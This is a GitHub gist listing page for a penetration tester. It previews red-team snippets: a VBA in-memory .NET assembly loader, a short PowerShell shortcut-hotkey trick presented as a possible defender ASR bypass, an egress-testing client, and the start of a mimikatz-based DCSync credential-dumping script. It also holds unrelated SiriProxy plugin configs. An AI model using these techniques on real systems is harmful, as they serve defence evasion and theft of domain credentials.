Skip to content

Instantly share code, notes, and snippets.

Nick Landers monoxgas

  • Silent Break Security
  • Utah, United States
Block or report user

Report or block monoxgas

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active Oct 21, 2019
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
View mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@monoxgas
monoxgas / shortcut.ps1
Last active Oct 12, 2019
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
View shortcut.ps1
$Shell = New-Object -Com WScript.Shell
$S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk")
$S.TargetPath = "calc.exe"
$S.Hotkey = "Ctrl+U"
$S.Save()
$Shell.SendKeys("^u")
Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk"
View Egress
function Invoke-EgressAssess
{
<#
.Synopsis
Egress-assess powershell client.
.Description
This script will connect to an Egress-assess server and transfer faux Personally Identifiable Information or
View Rulz.py
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@monoxgas
monoxgas / Invoke-DCSync.ps1
Last active Oct 18, 2019
What more could you want?
View Invoke-DCSync.ps1
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
View siriproxy-nick.rb
require 'cora'
require 'siri_objects'
require 'pp'
class SiriProxy::Plugin::Nick < SiriProxy::Plugin
def initialize(config)
#if you have custom configuration options, process them here!
end
View gist:1455623
filter "StartRequest", direction: :from_iphone do |object|
puts "[Info - Button Information] #{object["properties"]}"
say "I don't have any #{object["properties"]["utterance"].capitalize} muffins, sorry..." #Fails Here, Logs the Say but never actually says it
object = false #After a while, it will google search my utterance I used
end
def createButton(text, utterance, command)
startRequest = SiriStartRequest.new(text, false, true) #Does the true proxyOnly parameter matter here?
sendCommand = SiriSendCommands.new
@monoxgas
monoxgas / gist:1454744
Created Dec 10, 2011
Copying the siriproxy-example plugin
View gist:1454744
1. Copy the siriproxy-example folder and rename it to siriproxy-*plugin*
2. open the gemspec file in your new plugin folder and change both of the plugin names to "siriproxy-*plugin*"
3. Open your .rb file in your plugin file/lib/ and change the line SiriProxy::Plugin::Example to SiriProxy::Plugin::*PluginName*
3. Open your config.yml and copy the Example plugin lines, make sure the spacing stays EXACTLY the same! Change Name: to *PluginName* from step 3, and change path to "/Users/*username*/SiriProxy/plugins/siriproxy-*plugin*/"
View gist:1454733
port: 443
log_level: 1
plugins:
# NOTE: run bundle after changing plugin configurations to update required gems
- name: 'Example'
path: '/Users/Equinox/SiriProxy/plugins/siriproxy-example'
# - name: 'Thermostat'
# git: 'git://github.com/plamoni/SiriProxy-Thermostat.git'
@monoxgas
monoxgas / Config.yml
Created Dec 10, 2011 — forked from anonymous/Config.yml
My Config File
View Config.yml
port: 443
log_level: 1
plugins:
# NOTE: run bundle after changing plugin configurations to update required gems
- name: 'Example'
path: './plugins/siriproxy-example'
# - name: 'Thermostat'
# git: 'git://github.com/plamoni/SiriProxy-Thermostat.git'
You can’t perform that action at this time.